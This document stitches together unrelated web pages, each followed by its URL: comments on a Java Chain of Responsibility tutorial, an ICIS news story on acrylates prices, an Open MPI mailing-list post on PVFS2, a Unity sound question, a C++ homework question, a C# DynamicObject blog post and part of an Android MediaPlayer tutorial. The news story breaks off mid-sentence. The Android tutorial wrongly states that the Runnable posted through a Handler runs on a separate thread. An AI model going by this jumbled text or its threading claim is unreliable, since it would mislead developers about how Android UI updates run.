After printing "Amount should be in multiple of 10s." you could apply continue instead of return, so that the program execution will continue. Just a minor suggestion, but nice explanation.

Great post; my only suggestion is to avoid repeated code like in the dispense method. All the logic could be in the base class.

Great explanation! Bro, it helps me to understand the chain of responsibility pattern. Thanks

Hello Pankaj, firstly I would like to thank you for this wonderful article. Just a finding from my end, which I would like to share. Please correct me if I am wrong. I think the else part in all the dispense methods is not required; it gives a wrong output. For example, see the following steps:

1. Say I entered 60; it will enter the Dollar50 dispense method and it will print (1 note being dispensed – 50 dollar).
2. As the remainder is != 0, it will go to the next dispenser in the chain.
3. Say I entered 50; it will enter the Dollar50 dispense method and it will print (1 note being dispensed – 50 dollar).
4. As the remainder is 0, it will enter the else part and it will print the above content again (as shown in point 3).

I did test on my machine and removed the else part, and it works correctly for any number.
Regards, Dolly

Can you please specify the code snippet you removed? The code is working fine. If you enter the amount as 50 then the output will be:

Enter amount to dispense
50
Dispensing 1 50$ note
Enter amount to dispense

Nice example, but I don't understand why you have a while(true) in the main method.

No particular reason. It's just so you can try as many examples as you want without having to restart the program every time. It's not necessary for the design pattern.

Reading the information, but I'm truly a beginner; I need more knowledge and skills to help me get started here!

Great explanations and sample! Thank you bro.

Great blog and perfect explanation with example.
Thanks

In public class Dollar10Dispenser implements DispenseChain, the call this.chain.dispense(cur); can cause a NullPointerException. The composition says [0…1], so for Dollar10Dispenser the next DispenseChain is not required; you can remove that call to avoid the null exception.

Nice example and well explained. In the dispense method of Dollar50Dispenser, Dollar20Dispenser and Dollar10Dispenser, the else part is not required, I guess. The request is already getting passed to the next chain's dispense if remainder != 0. Correct me if I am wrong. And I didn't get the use of the always-true while loop in the main method. Not required, I guess.

Awesome article for this concept. Thank you for your articles.

Will this program ever return two 50$ (or 20$ or 10$) notes? If yes, then can anybody explain how?

Yes it will. The first condition is for 50$: if(cur.getAmount() >= 50){ int num = cur.getAmount()/50; ... }. Consider cur.getAmount() is 156, so num will be 3 notes of $50.

Thanks a lot, man!! Gave me a clear-cut view of the filter chain! Keep up the good work!

Nice article. Why don't you check whether the next chain is set before calling its dispense() method? Your example doesn't throw a null pointer exception only because you assert that the entered value is a multiple of 10. But that is information the Dollar10Dispenser doesn't know.

Great example… You rock as always, Pankaj! You gave a crisp and clear explanation.

I liked the explanation. It was very crisp and clear.

Good example, and quite easy to understand the design pattern.

Thanks Karthik for the nice words.

Nice and clear example. Thanks

Easy to understand. Thank you

Thank you very much Pankaj. The tutorial on Design Patterns was very helpful. I could get a brief overview of Design Patterns, and one more good point is that you have taken real-world examples to demonstrate.
In some part of the tutorial you have mentioned that one design pattern can be combined with another to make it more efficient; it would be helpful if you posted some samples on that. Great work buddy. Thanks a lot.

Yes, this is very easy to follow, and with real-world examples. Thanks for sharing.

Examples are great; trying to understand where the code would be put in.

Mate, once again, check your English! It's loose coupling. Furthermore, Gaurav, you're right about only one object handling the request. That would be what's called a pure implementation. On the other hand, there's no real problem with letting the request go through the entire tree. Another point, which is not discussed in this article, is that you may set or change the next handler during runtime. You also may not know beforehand which handlers should be used, allowing the client to set them as desired. As an example, you could have many Validator classes which can be called in a certain order. But that depends on the validation. So you apply CoR and make good use of the possibility of combining different validators ordered in so many different ways. Suppose you want to validate an email address. You need to check if the e-mail is correctly formed, if it exists, and if it contains bad words. To do this job, you may have three different classes, and you can arrange them in any order – so you might as well let the client decide its own priority.

After implementing this design pattern for years, I commonly see that there is repeated code in the concrete classes, just like the implementation of your dispense methods. The intent of this design pattern is nice, but don't forget the DRY principle; it is a must in my humble opinion. I always use abstract classes for the CoR design pattern to eliminate duplicate code.

Good example. I'd like to point out one thing though. The pattern per the GoF definition says that 'Only one object in the chain is supposed to handle a request'.
In your example I see handlers ($50 and $20) doing the work partially and letting the $10 handler do the rest of the job. I think I may be wrong, because the GoF also says: use CoR when more than one object may handle the request…

Hi, nice tutorial. Just one suggestion: setNextChain() could have been moved into an abstract DispenseChain class instead of being declared abstract and overridden in all the concrete classes.

By having setNextChain() as an abstract method, we are forcing subclasses to provide an implementation for it. For example purposes the implementation is simple, but there might be cases where some logic is involved. Yes, if it's as simple as this, we can move it to the abstract class. It's a design decision and should be based on project requirements.

Getting the below exception…

Exception in thread "main" java.lang.NullPointerException
    at com.chain.responsibility.dispenser.HundredDollarDispenser.dispense(HundredDollarDispenser.java:26)
    at com.chain.responsibility.dispenser.FiftyDollarDispenser.dispense(FiftyDollarDispenser.java:30)
    at com.chain.responsibility.dispenser.ATMDispenseChain.main(ATMDispenseChain.java:33)

The problem is we don't have setNextChain for the last level.

Hi, can you provide the download link for this example?

There is no download link; it's simple Java classes. You can copy-paste the code and run it.
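Pulling together the suggestions in this thread (an abstract base class for DRY, and a null check so the last link in the chain needs no successor), a minimal sketch of the dispenser chain might look like this. The class names follow the article; the shared abstract base class is the refactoring suggested in the comments, not the article's original code:

```java
// Sketch: Chain of Responsibility ATM dispenser with the duplicated
// dispense logic pulled into an abstract base class, as suggested above.
class Currency {
    private final int amount;
    Currency(int amount) { this.amount = amount; }
    int getAmount() { return amount; }
}

abstract class DispenseChain {
    private DispenseChain next;          // [0..1]: the last link has no next
    private final int denomination;

    DispenseChain(int denomination) { this.denomination = denomination; }

    void setNextChain(DispenseChain next) { this.next = next; }

    // Shared logic: dispense what we can, pass any remainder down the chain.
    String dispense(Currency cur) {
        StringBuilder out = new StringBuilder();
        int num = cur.getAmount() / denomination;
        int remainder = cur.getAmount() % denomination;
        if (num > 0) {
            out.append("Dispensing ").append(num).append(" ")
               .append(denomination).append("$ note\n");
        }
        if (remainder != 0 && next != null) {  // null check avoids the NPE
            out.append(next.dispense(new Currency(remainder)));
        }
        return out.toString();
    }
}

class Dollar50Dispenser extends DispenseChain {
    Dollar50Dispenser() { super(50); }
}

class Dollar20Dispenser extends DispenseChain {
    Dollar20Dispenser() { super(20); }
}

class Dollar10Dispenser extends DispenseChain {
    Dollar10Dispenser() { super(10); }
}

public class ATMDispenseChain {
    public static String dispense(int amount) {
        DispenseChain c1 = new Dollar50Dispenser();
        DispenseChain c2 = new Dollar20Dispenser();
        DispenseChain c3 = new Dollar10Dispenser();
        c1.setNextChain(c2);
        c2.setNextChain(c3);
        return c1.dispense(new Currency(amount));
    }

    public static void main(String[] args) {
        System.out.print(dispense(280)); // 5x$50, 1x$20, 1x$10
    }
}
```

With this shape, the concrete classes shrink to one constructor each, and the chain can end anywhere without a NullPointerException.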
https://www.journaldev.com/1617/chain-of-responsibility-design-pattern-in-java
19 October 2012 19:41 [Source: ICIS news]

By Larry Terry

HOUSTON (ICIS)--Two November price-increase efforts of 6-8 cents/lb ($132-176/tonne, €102-136/tonne) have been more difficult than usual for buyers to tolerate, given prevailing soft acrylates market conditions. The proposed 8-cent/lb increases cover Arkema's 2-ethylhexyl acrylate (2-EHA) and methyl acrylate (methyl-A).

Most buyers do not seem to argue with the idea of sellers recouping input costs, but primary feedstock chemical-grade propylene (CGP) has moved negligibly during the past several months. Although CGP fell sharply in May and June, it has been all but stable in recent months, settling flat for July, falling by 1.50 cents/lb for August and rising by just 1.00 cent/lb for September.

Only two producers, Dow Chemical and Arkema, have announced plans to boost acrylates prices, effective on 1 November or as contracts allow. And only one of those sellers has offered a reason for its increase initiative.

"Raw material prices, specifically propylene, have increased and are projected to be volatile over the upcoming months," Dow said in a 15 October price letter to customers announcing its planned 7 cent/lb hikes.

The rationale of "expected volatility in raw material prices" has been derided by some buyers, with one calling it ridiculous. Buyers are adamant that November price-hike efforts should fail, and they are hopeful they will fail, especially given the absence of acrylates initiatives from BASF. All of the producers have been reticent, but most buyers said BASF is not expected to pursue November price increases.

Two buyers suggested producers are responding to - or taking advantage of - supply concerns stemming from the acrylic acid unit explosion at Nippon Shokubai's complex in Himeji, Japan, at the end of September. The site's acrylic acid plant, which has a nameplate production capacity of 380,000 tonnes/year, was one of several operations taken down at the site.
The duration of shutdowns there is not known, but no Further, any acrylates price gains would be predicated solely on propylene, a buyer said. “I don't see any of the price initiatives being implemented with contract customers,” a buyer said. “Propylene only moved up by 1.50 cents/lb in October, and I am expecting my contract suppliers to move up by only 80-90% of
http://www.icis.com/Articles/2012/10/19/9605736/Proposed-US-acrylates-hikes-fight-against-stable-feedstock.html
Subject: Re: [OMPI users] Problems Using PVFS2 with OpenMPI
From: Edgar Gabriel (gabriel_at_[hidden])
Date: 2010-01-13 12:55:51

I don't know whether it's relevant for this problem or not, but a couple of weeks ago we also found that we had to apply the following patch to compile ROMIO with OpenMPI over pvfs2. There is an additional header pvfs2-compat.h included in the ROMIO version of MPICH, but it is somehow missing in the OpenMPI version...

ompi/mca/io/romio/romio/adio/ad_pvfs2/ad_pvfs2.h
--- a/ompi/mca/io/romio/romio/adio/ad_pvfs2/ad_pvfs2.h Thu Sep 03 11:55:51 2009 -0500
+++ b/ompi/mca/io/romio/romio/adio/ad_pvfs2/ad_pvfs2.h Mon Sep 21 10:16:27 2009 -0500
@@ -11,6 +11,10 @@
 #include "adio.h"
 #ifdef HAVE_PVFS2_H
 #include "pvfs2.h"
+#endif
+
+#ifdef PVFS2_VERSION_MAJOR
+#include "pvfs2-compat.h"
 #endif

Thanks
Edgar

Rob Latham wrote:
> On Tue, Jan 12, 2010 at 02:15:54PM -0800, Evan Smyth wrote:
>> OpenMPI 1.4 (had same issue with 1.3.3) is configured with
>> ./configure --prefix=/work/rd/evan/archives/openmpi/openmpi/1.4/enable_pvfs \
>> --enable-mpi-threads --
>> PVFS 2.8.1 is configured to install in the default location (/usr/local) with
>> ./configure --with-mpi=/work/rd/evan/archives/openmpi/openmpi/1.4/enable_pvfs
>
> In addition to Jeff's request for the build logs, do you have
> 'pvfs2-config' in your path?
>
>> .
>
> That's a good piece of information. I run in that configuration
> often, so we should be able to make this work.
>
>> .
>
> PVFS needs an MPI library only to build MPI-based testcases. The
> servers, client libraries, and utilities do not use MPI.
>
>> ).
>
> In this case, since you do not have the PVFS file system mounted, the
> 'pvfs2:' prefix is mandatory. Otherwise, the MPI-IO library will try
> to look for a directory that does not exist.
>
>> .
>
> It sounds like you're on the right track. I should update the PVFS
> quickstart for the OpenMPI specifics.
> In addition to pvfs2-ping and pvfs2-ls, make sure you can pvfs2-cp
> files to and from your volume. If those 3 utilities work, then your
> OpenMPI installation should work as well.
>
> ==rob
> --
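For anyone reconstructing the setup discussed in this thread, the build steps look roughly like the fragment below. The paths and versions are illustrative, and the `--with-io-romio-flags` option is the usual way to enable ROMIO's PVFS2 driver in Open MPI rather than something quoted from this thread:

```shell
# Sketch of a PVFS2 + Open MPI build (paths illustrative, not from the thread).
# 1. Build and install PVFS2 first, so pvfs2-config ends up on PATH.
cd pvfs-2.8.1
./configure --prefix=/usr/local
make && make install
export PATH=/usr/local/bin:$PATH   # ROMIO's configure probes pvfs2-config

# 2. Build Open MPI, telling its bundled ROMIO to enable the PVFS2 driver.
cd ../openmpi-1.4
./configure --prefix=$HOME/openmpi-pvfs \
    --with-io-romio-flags="--with-file-system=pvfs2+ufs+nfs"
make && make install

# 3. Sanity-check the volume before running MPI-IO jobs. Since the file
#    system is not mounted, MPI codes must open files with the "pvfs2:" prefix.
pvfs2-ping -m /mnt/pvfs2
pvfs2-cp /etc/hosts /mnt/pvfs2/hosts-test
```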
http://www.open-mpi.org/community/lists/users/2010/01/11753.php
I'm using a C# script and I'm wondering how to play a sound when I press the H key. It won't work, and I'm using a .wav sound file, nothing big. I can't get anything to play.

[RequireComponent(typeof(AudioSource))]
public class PlayerHealth : MonoBehaviour {

    public AudioClip PlayerHit;

    // Update is called once per frame
    void Update () {
        if (Input.GetKeyDown (KeyCode.H)) {
            audio.PlayOneShot(PlayerHit);
        }
    }
}

Do you get any runtime errors with this, or is there just no sound playing? Add a debug line to see if the PlayOneShot method gets called. Maybe your clip is marked as a 3D sound (default setting) and your listener is too far away.

No errors at all.

Answer by khan-amil · Jan 21, 2014 at 01:31 PM

Assuming that's all, your code is good and should work. Be sure to check that your sound is either 2D or that your source is close to your Listener (the default is on the main camera).

Answer by Drakulo · Jan 21, 2014 at 01:29 PM

If your sound is defined as "3D", playing it will take the audio listener's position in 3D space into account and apply volume changes. Have you tried to use a 2D sound? You can change it in the inspector when selecting your sound in the project.
https://answers.unity.com/questions/621904/playing-sound.html
Hi! Having some major issues with my homework assignment. I have to end this while loop when detecting two consecutive newline escape sequences in a row. This is the word problem:

Write a program that gives and takes advice on program writing. The program starts by writing a piece of advice to the screen and asking the user to type in occurrences of the character '\n'.

Any help would be greatly appreciated.

#include <iostream>
#include <fstream>
#include <cstdlib>

using namespace std;

ifstream reader;
ofstream writer;

void readerOpen() {
    reader.open("hw4pr5input.txt");
    if (reader.fail()) {
        cout << "\nThere was an error opening the file.\n";
        exit(1);
    }
}

void writerOpen() {
    writer.open("hw4pr5input.txt");
    if (writer.fail()) {
        cout << "\nThere was an error opening the file.\n";
        exit(1);
    }
}

//////////////////////////////////////////////////////////////////////////
int main() {
    char data;
    char tmp;
    bool escapePrevious = false;

    cout << "\nSolution to Homework Assignment 4 Problem 5\n";

    readerOpen();
    cout << "\nAdvice of previous user: " << endl;
    while (!reader.eof()) {
        reader.get(data);
        cout.put(data);
    }
    reader.close();

    writerOpen();
    data = ' ';
    cout << "\nPlease enter your advice. End by hitting Enter twice:\n\n";

    //////////////////////////////////////////////////////////////////////
    while (!writer.eof() && escapePrevious != true && tmp != '\n') {
        cin.get(data);
        writer.put(data);
        if (data == '\n') {
            if (escapePrevious == true) {
                tmp = '\n';
            } else {
                escapePrevious = true;
            }
        }
    }

    /* The way I see it, if I press the return key, the conditional with
       if (data == '\n') will skip the first conditional statement and assign
       escapePrevious true, and then if the condition is tested a second time
       and escapePrevious is already true, tmp will be assigned the newline
       character, thus negating the condition in my while loop. I'm doing
       something terribly wrong here because it is exiting the loop the first
       time I press return. */

    writer.close();
    cout << "\nThanks for the advice." << endl;
    system("Pause");
    return 0;
}
https://www.daniweb.com/programming/software-development/threads/312345/c-homework
On Dynamic Objects and DynamicObject

As you know if you read my blog, C# 4.0 introduced some language features that help you consume dynamic objects. Although it's not part of the language, most of the writing about dynamic in C# that I have seen, including my own, also contains some point about how you create dynamic objects. And they usually make it clear that the easiest way to do that is to extend System.Dynamic.DynamicObject. For instance, you might see an example such as the following, which is pretty straightforward:

using System;
using System.Dynamic;

class MyDynamicObject : DynamicObject
{
    public override bool TryInvokeMember(InvokeMemberBinder binder, object[] args, out object result)
    {
        Console.WriteLine("You called method {0}!", binder.Name);
        Console.WriteLine("... and passed {0} args.", args.Length);
        result = null;
        return true;
    }
}

class Program
{
    static void Main(string[] args)
    {
        dynamic d = new MyDynamicObject();
        d.Foo(d, 1, "bar");
    }
}

... that prints:

You called method Foo!
... and passed 3 args.

That's all well and good. But I want to tell you that although this works and is easy, DynamicObject is not a type that is specially known to the DLR, and that this is not the primary mechanism to define dynamic objects. The primary mechanism is to implement the interface IDynamicMetaObjectProvider, and to provide your own specialization of DynamicMetaObject. These two types are specially known to the DLR and they are the mechanism by which dynamic (including DynamicObject) really works. DynamicObject is a tool of convenience. You could write it yourself, if you wanted to. The design of DynamicObject deliberately introduces some trade-offs in the name of ease-of-use, and if your code or library is not OK with those trade-offs, then you should consider your alternatives.

Binding vs. executing

One thing that DynamicObject does to your dynamic objects is that it confuses two separate "phases" of the execution of a dynamic operation.
There is a lot of machinery in the DLR that is designed to make your dynamic operations fast, and there are concepts called "call sites" and "rules" and "binders," etc., and you can dig into this yourself if it's important, but the upshot is: when a dynamic operation is bound at runtime, the binding is cached using something called a "rule" that indicates the circumstances under which to execute some code, as well as the code to execute. Subsequent to the binding, the code the binding produced is simply run when needed.

If you implement your dynamic object using DynamicObject, these things still happen. However, the cached rules don't bake your decisions in; they call the code you put in your DynamicObject again every time a true dynamic operation executes. Let me give you an example to make this a little clearer. Suppose you wanted to write a dynamic type that queried some external data somewhere. With DynamicObject, you might do something like the following:

class MyDynamicData : DynamicObject
{
    public override bool TryGetMember(GetMemberBinder binder, out object result)
    {
        string propName = binder.Name;
        if (this.externalData.HasColumn(propName))
        {
            result = this.externalData.GetData(this.currentRow, propName);
            return true;
        }
        else
        {
            return base.TryGetMember(binder, out result);
        }
    }

    // ...
}

In this code, we're trying to get a property value. So we go to the external data to see if the property name makes sense, and then we retrieve the relevant data to return to the user. Remember I said that dynamic bindings use "rules?" If the user types "d.FooBaz", where d holds one of these MyDynamicData objects, then the "rule" that is generated is as follows.
First, the test part is this:

($arg0 TypeEqual MyDynamicData)

And the execution part is this:

.Block(System.Object $var1) {
    .If (
        .Call ((System.Dynamic.DynamicObject)$arg0).TryGetMember(
            .Constant<System.Dynamic.GetMemberBinder>(Microsoft.CSharp.RuntimeBinder.CSharpGetMemberBinder),
            $var1)
    ) {
        $var1
    } .Else {
        .Throw .New Microsoft.CSharp.RuntimeBinder.RuntimeBinderException("'MyDynamicData' does not contain a definition for 'FooBaz'")
    }
}

If that syntax doesn't make much sense to you, let me explain. The DLR encodes these things using LINQ expression trees, and the strings above are simply a debug view of those things. They're not complicated. Basically, the rule says that if the actual runtime type of the object is a MyDynamicData, then what the DLR should execute is the code below, which calls your TryGetMember, and if that returns true then return your result. Otherwise, it should throw an exception that says there is no property FooBaz. That exception, incidentally, came from the C# binder.

The whole dance that goes on to determine what the rule is is a little bit complicated, but the important part is that the TryGetMember you defined in your MyDynamicData is not a part of it. Instead, every single time that user's line of code that contains "d.FooBaz" runs, your TryGetMember is run. Every time.

You could imagine an alternative, where instead of TryGetMember running every time, you write some code that looks at the name of the property and makes a determination about what it should do, and then the rule contains code that simply does that thing. In our case, the rule would just have to run the "this.externalData.GetData(this.currentRow, propName)" part. Or just throw if the property name was bogus. Either way, you're doing less every time through. Of course, this alternative exists, and it requires you not to use DynamicObject.
If you implemented your own IDynamicMetaObjectProvider, you could slim up your rules as much as possible by doing your analysis once, not on every execution.

Object is king--except DynamicObject

There is another snag in DynamicObject that is in place in the interest of speed and ease-of-use, and it is the following: when the call site's underlying language provides some binding for any operation, that binding overrules any dynamic bindings that might exist. This is in contrast to the ordinary behavior in the DLR, which is that the object gets to pick what it wants to do first. That strategy is sometimes summarized by the DLR's designers as "object is king." And, well, DynamicObject in some sense adheres to this principle, except that what it decides to do is defer to the language whenever it can. This has some interesting consequences in C#. Check out the following program.

using System;
using System.Collections;
using System.Dynamic;

class MyDynamicObject : DynamicObject
{
    public override bool TryBinaryOperation(BinaryOperationBinder binder, object arg, out object result)
    {
        Console.WriteLine("TryBinaryOperation for {0}", binder.Operation);
        result = "dynamically returned result";
        return true;
    }

    public override bool TryConvert(ConvertBinder binder, out object result)
    {
        Console.WriteLine("TryConvert for {0}", binder.Type.Name);
        result = new string[] { "dynamically", "returned", "result" };
        return true;
    }
}

class QuestionableProgram
{
    static void Main(string[] args)
    {
        dynamic d = new MyDynamicObject();
        Console.WriteLine(d == null);
        Console.WriteLine((IEnumerable)d);
    }
}

What does this do? You might like to think that it prints the strings in the DynamicObject method overrides. But it does not. It prints "False" and then throws. Why? Because when the DynamicObject was asked to bind itself, it first asked the C# binder to bind the operations. In the first case, "d == null", the C# binder said "yes! I can bind this!
here you go!" and returned a normal object identity comparison. In the second case, the C# binder said "yes! I can bind this! here you go!" and returned a normal interface reference coercion. For that last one, recall that there is always an explicit conversion from most class types to any interface type in C# (6.2.4, bullet 3), though they can fail. And fail this one does, since MyDynamicObject does not statically implement IEnumerable.

Just to expand on the interface conversion example a bit, it's especially weird since if the conversion were implicit (say, try assigning to a local), then the dynamic conversion would have worked. Why? Because the C# binder would have said, "nope! no implicit conversion to IEnumerable," and then the DynamicObject implementation would have let TryConvert do its thing. And these are just some of the examples. This behavior means that you cannot dynamically do lots of things, including defining a ToString or Equals method, or even hiding such members as TryInvokeMember. In other words, if I have a DynamicObject in hand, concealed behind the dynamic type, all of the overridable members are always directly (though dynamically) invocable. Ugh. Again, if this behavior does not suit you, then you need to roll your own.

But there's a reason I don't mean to disparage DynamicObject. It really is a convenient and easy-to-use type, and if you're not exposing dynamic objects in a library then it may be perfectly suitable to use. The design decisions that led us here are deliberate. First, for the intermingling of binding and execution code, well, that whole protocol is very confusing. DynamicObject presents a much easier-to-understand model. It doesn't even require you to understand LINQ expression trees. But it gives up performance. Then, binding statically when possible gets a lot of that performance back.
To give an example, although you cannot directly dynamically expose all the things I mentioned in the last bit (==, interface conversions, etc.), you can just as easily introduce them statically and they'll get called with no further help from you, and more quickly too. ExpandoObject, by the way, is the other convenience type for users of static languages such as C# to create dynamic objects. You can read about both of these types, if you are interested, in the DLR's excellent documentation at. Just remember that when someone says that "DynamicObject is the way to generate dynamic types in C#," what they should really have said is that DynamicObject is a way to generate dynamic types in C#. Other ways include implementing IDynamicMetaObjectProvider directly, or stepping outside of C# and defining some types in Python or Ruby or any other DLR language. I intend to present some of these alternatives in the future.
https://docs.microsoft.com/en-us/archive/blogs/cburrows/on-dynamic-objects-and-dynamicobject
MediaPlayer: Simplified Video Playback on Android

Playing videos is a common requirement in Android apps. In this tutorial, learn about handling video playback via the MediaPlayer API on Android.

Version - Kotlin 1.4, Android 4.4, Android Studio 4.0

Playing audio or video in Android apps is a common requirement for many projects. Many apps in the Google Play Store, even some non-streaming ones, provide audio and video playback. Above all, it's an important topic that will lead you to many job opportunities.

In this tutorial, you'll build an Android app that plays video from various sources, such as videos stored locally on your phone, the res folder, the gallery and a URL, using MediaPlayer. Along the way you'll learn about:

- MediaPlayer.
- The states of MediaPlayer.
- Playing video from the res/raw folder.
- Playing video from a URL.
- Best practices for MediaPlayer.
- Digital Rights Management.

Getting Started

Download the materials using the Download Materials button at the top or the bottom of this page. Extract and open the starter project in Android Studio. Build and run. You'll see something like this:

The app isn't interactive yet because the starter project only consists of UI and some basic code. You'll implement the functionality throughout this tutorial.

Understanding the code

Before the hands-on part of this tutorial, take some time to understand the codebase you'll build on. Navigate to these three files and check out their contents:

- AndroidManifest.xml: At the top of the manifest file you'll find android.permission.INTERNET. In this tutorial, you'll play a video from a URL, so you'll need the INTERNET permission.
- activity_video.xml: This is the one and only layout file in the project. It consists of:
  - A VideoView to play video.
  - A ProgressBar to show the user it's loading a video.
  - Two TextViews and a SeekBar to show progress.
  - An ImageButton to play and pause a video.
- VideoActivity.kt: This might look a bit overwhelming, but if you skim through and read the comments, you'll find it quite simple. The class implements a few interface classes to manage MediaPlayer and seekBar callbacks. You'll understand these implementations once you start working on the functionality. Also, to keep your app from falling asleep, you'll need to keep the screen on. Notice this line inside onCreate(), which adds a flag: window.addFlags(WindowManager.LayoutParams.FLAG_KEEP_SCREEN_ON). Setting this flag ensures your screen stays on while the app is in use. You don't want the user's device to fall asleep and lock while they're watching a video on your app, do you?

MediaPlayer

MediaPlayer is a part of the Android multimedia framework that plays audio or video from the resource directory and gallery. It also streams music or video from a URL. When a media file plays, the MediaPlayer API goes through several states, which are summarized in the diagram below:

That's a lot of information to take in, but before you can use the API effectively, you need to know what each state means:

- Idle State: MediaPlayer is in an idle state when you first instantiate it, or first create it using the new keyword. You also reach this state after you call reset(). At this stage, you can't play, pause or stop the media. If you try to force it, the app might crash.
- End State: Calling MediaPlayer's release() method frees resources and moves it to the end state. At this stage, you can't play or pause the media.
- Error State: You reach this state if you try to play, pause or stop an uninstantiated MediaPlayer object. However, you can catch the error using MediaPlayer's OnErrorListener.onError() callback.
- Initialized State: MediaPlayer reaches this state when you set a data source. To set one, use the setDataSource() method. Be aware that you can only set a data source when MediaPlayer is in the idle state, or it'll throw an IllegalStateException.
- Prepared State: Before you play any media from a file or a URL, you need to prepare your MediaPlayer by calling either prepare() or prepareAsync(). Once prepared, it reaches this state and calls onPreparedListener().
- Started State: Once MediaPlayer is ready, you can play the media by calling start(). While the music or video plays, MediaPlayer is in the started state.
- Paused State: When you pause the media, MediaPlayer is in this state. To pause MediaPlayer, call pause().
- Stopped State: MediaPlayer is in this state when media stops playing. If MediaPlayer is in this state and you want to play the media again, you have to prepare it again by calling prepare() or prepareAsync().
- PlaybackCompleted State: When the playback is complete, MediaPlayer is in this state and invokes OnCompletionListener.onCompletion(). If MediaPlayer is in this state, you can call start() and play the audio or video again.

Okay, enough theory. It's time to code!

Playing Video From Local Resources

You will start by playing a video file in the raw directory. There's a video in the starter project named test_video.mp4. From the states you learned above, you can see that to play the video in your VideoView, you have to:

- Set the data source using MediaPlayer
- Call the start() function

But you may be wondering where to add this code. A couple of options may come to mind. The most common way to add new code in Android apps is to put it in the onCreate() method, because you know it will be the entry point of your activity. But in the case of MediaPlayer that's not good practice, for two reasons:

- First, you don't know the size of the video or how much time MediaPlayer will take to load it.
- Second, MediaPlayer can play a video in VideoView only through its surface, which also takes time to be created.

Take a look at the code inside the onCreate() method of VideoActivity.
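The lifecycle above can be condensed into a framework-free sketch in plain Java. This is only an illustration of which calls are legal in which state; SimplePlayer and PlayerState are made-up names, not the Android API, and the Error and PlaybackCompleted states are omitted for brevity:

```java
// Illustrative, framework-free model of the MediaPlayer state rules
// described above. Not the Android API; Error and PlaybackCompleted
// states are omitted to keep the sketch small.
public class SimplePlayer {
    enum PlayerState { IDLE, INITIALIZED, PREPARED, STARTED, PAUSED, STOPPED, END }

    private PlayerState state = PlayerState.IDLE;

    PlayerState getState() { return state; }

    void setDataSource(String uri) {
        if (state != PlayerState.IDLE) {          // only legal from Idle
            throw new IllegalStateException("setDataSource in " + state);
        }
        state = PlayerState.INITIALIZED;
    }

    void prepare() {
        // Legal after setting a data source, or again after stop().
        if (state != PlayerState.INITIALIZED && state != PlayerState.STOPPED) {
            throw new IllegalStateException("prepare in " + state);
        }
        state = PlayerState.PREPARED;
    }

    void start() {
        if (state != PlayerState.PREPARED && state != PlayerState.PAUSED) {
            throw new IllegalStateException("start in " + state);
        }
        state = PlayerState.STARTED;
    }

    void pause() {
        if (state != PlayerState.STARTED) {
            throw new IllegalStateException("pause in " + state);
        }
        state = PlayerState.PAUSED;
    }

    void stop() {
        if (state != PlayerState.STARTED && state != PlayerState.PAUSED) {
            throw new IllegalStateException("stop in " + state);
        }
        state = PlayerState.STOPPED;              // must prepare() again
    }

    void release() { state = PlayerState.END; }   // legal from any state

    public static void main(String[] args) {
        SimplePlayer p = new SimplePlayer();
        p.setDataSource("raw/test_video");
        p.prepare();
        p.start();
        p.pause();
        p.release();
    }
}
```

With the legal transitions in mind, back to the code inside onCreate().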
In there you will see the following line: video_view.holder.addCallback(this). This registers a callback for when the VideoView's surface is ready for playing video. When this surface is ready, it calls surfaceCreated().

Next, inside surfaceCreated() replace // TODO (1) with:

mediaPlayer.apply {
  // 1
  setDataSource(applicationContext,
      Uri.parse("android.resource://$packageName/raw/test_video"))
  // 2
  setDisplay(surfaceHolder)
  // 3
  prepareAsync()
}

In this code, you perform three tasks:

- First, you pass the location (a URI) of the video.
- Then, you set MediaPlayer's display to the VideoView's surface by calling setDisplay(surfaceHolder). Note: If you started the MediaPlayer without calling this function, you wouldn't see any video because MediaPlayer wouldn't know where to display the video.
- Finally, you call prepareAsync(), which prepares MediaPlayer for playback. You'll look at why this is the asynchronous variant, rather than the blocking prepare(), later in the tutorial.

MediaPlayer is prepared

When MediaPlayer is prepared, it invokes onPrepared(). This is the point where you'll start playing the video. To do that, replace // TODO (2) inside onPrepared() with:

// 1
progress_bar.visibility = View.GONE
// 2
mediaPlayer?.start()

Here you:

- Make the progressBar invisible.
- Tell MediaPlayer to start the video.

Now Build and Run. Tada! Now you can play the video from your raw resource directory, but something is still missing. The seekBar isn't updating, and you can't pause or play the video. Next, you'll implement the missing functionality and make the app more intuitive.

Improving the UX

Before you add the functionality to play, pause or fast-forward video using SeekBar, you need to create a few functions and extension properties. At the bottom of VideoActivity.kt replace // TODO (3) with:

// 1
private val MediaPlayer.seconds: Int
  get() {
    return this.duration / SECOND
  }

// 2
private val MediaPlayer.currentSeconds: Int
  get() {
    return this.currentPosition / SECOND
  }

These extension properties help you implement those functionalities. MediaPlayer itself provides the video duration and currentPosition, so you don't have to worry about tracking them.

- seconds returns the total duration of the video in seconds.
- currentSeconds returns the current playback position of the video in seconds.

In addition, you'll create three functions that initialize and periodically update the seekBar, and convert the seconds to a more readable format.

First, convert the seconds by replacing // TODO (4) with:

private fun timeInString(seconds: Int): String {
  return String.format(
    "%02d:%02d",
    (seconds / 3600 * 60 + ((seconds % 3600) / 60)),
    (seconds % 60)
  )
}

In this function you convert seconds to an MM:SS format. If the video is more than 60 seconds long, it's better to show 2:32 minutes rather than 152 seconds.

To initialize the seekBar, replace // TODO (5) with:

private fun initializeSeekBar() {
  // 1
  seek_bar.max = mediaPlayer.seconds
  // 2
  text_progress.text = getString(R.string.default_value)
  text_total_time.text = timeInString(mediaPlayer.seconds)
  // 3
  progress_bar.visibility = View.GONE
  // 4
  play_button.isEnabled = true
}

When MediaPlayer prepares to play the video, this function is executed. The code performs the following:

- Sets the maximum value for the SeekBar.
- Sets default values for the TextViews which show the progress and the total duration of the video.
- Hides the ProgressBar.
- Enables the play button.

Next, to periodically update the seekBar as the video plays, replace // TODO (6) with:

private fun updateSeekBar() {
  runnable = Runnable {
    text_progress.text = timeInString(mediaPlayer.currentSeconds)
    seek_bar.progress = mediaPlayer.currentSeconds
    handler.postDelayed(runnable, SECOND.toLong())
  }
  handler.postDelayed(runnable, SECOND.toLong())
}

In this function, you use a Runnable to execute code periodically, once every second. Runnable is a Java interface and executes on a separate thread.
Since it executes on a separate thread, it won't block your UI, and the SeekBar and TextViews will update periodically.

Instead of playing the video as soon as MediaPlayer is ready, it would be better if the user could play and pause the video using the ImageButton. Inside the onCreate() function replace // TODO (7) with:

play_button.setOnClickListener {
  // 1
  if (mediaPlayer.isPlaying) {
    // 2
    mediaPlayer.pause()
    play_button.setImageResource(android.R.drawable.ic_media_play)
  } else {
    // 3
    mediaPlayer.start()
